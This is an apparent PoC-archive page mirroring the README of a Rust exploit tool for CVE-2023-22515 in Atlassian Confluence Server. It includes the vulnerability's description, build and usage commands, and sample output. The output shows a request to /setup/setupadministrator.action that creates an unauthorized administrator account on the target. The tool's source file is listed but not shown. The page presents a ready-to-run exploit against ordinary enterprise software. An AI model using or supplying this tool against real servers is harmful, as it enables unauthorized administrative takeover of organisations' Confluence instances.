Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-22515 PoC — Atlassian Confluence Server 安全漏洞

Source
https://github.com/killvxk/CVE-2023-22515-joaoviictorti
Associated Vulnerability
Title:Atlassian Confluence Server 安全漏洞 (CVE-2023-22515)
Description:Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Description
CVE-2023-22515 (Confluence Broken Access Control Exploit)
Readme
# CVE-2023-22515

<p align="left">
	<a href="https://www.rust-lang.org/"><img src="https://img.shields.io/badge/made%20with-Rust-red"></a>
	<a href="#"><img src="https://img.shields.io/badge/platform-osx%2Flinux%2Fwindows-blueviolet"></a>
</p>

- [Overview](#overview)
- [Compile](#compile)
- [Usage](#usage)
- [Running CVE-2023-22515](#running-cve-2023-22515)

# Overview

Confluence is a web-based enterprise wiki developed by Australian software company Atlassian.
Atlassian has been made aware of an issue reported by some customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence server and data center instances to create unauthorized Confluence administrator accounts and access Confluence instances.

The vulnerability has been classified as ```CVE-2023-22515```

# Compile

First perform the compilation with the command:

```sh
cargo build --release
```

# Usage

You can do it in these two ways:
```sh
cargo run -- --target http://localhost --username "teste" --password "teste" 
```

```sh
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 
```

This will display help for the tool. Here are all the switches it supports:

```yaml
CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help
```

# Running CVE-2023-22515

```console
cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
```
File Snapshot

 [4.0K]  /data/pocs/0ea5d13b490e65d1738207ff0efc59ea05d9258e
├── [ 32K]  Cargo.lock
├── [ 307]  Cargo.toml
├── [1.9K]  README.md
└── [4.0K]  src
    └── [3.3K]  main.rs

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →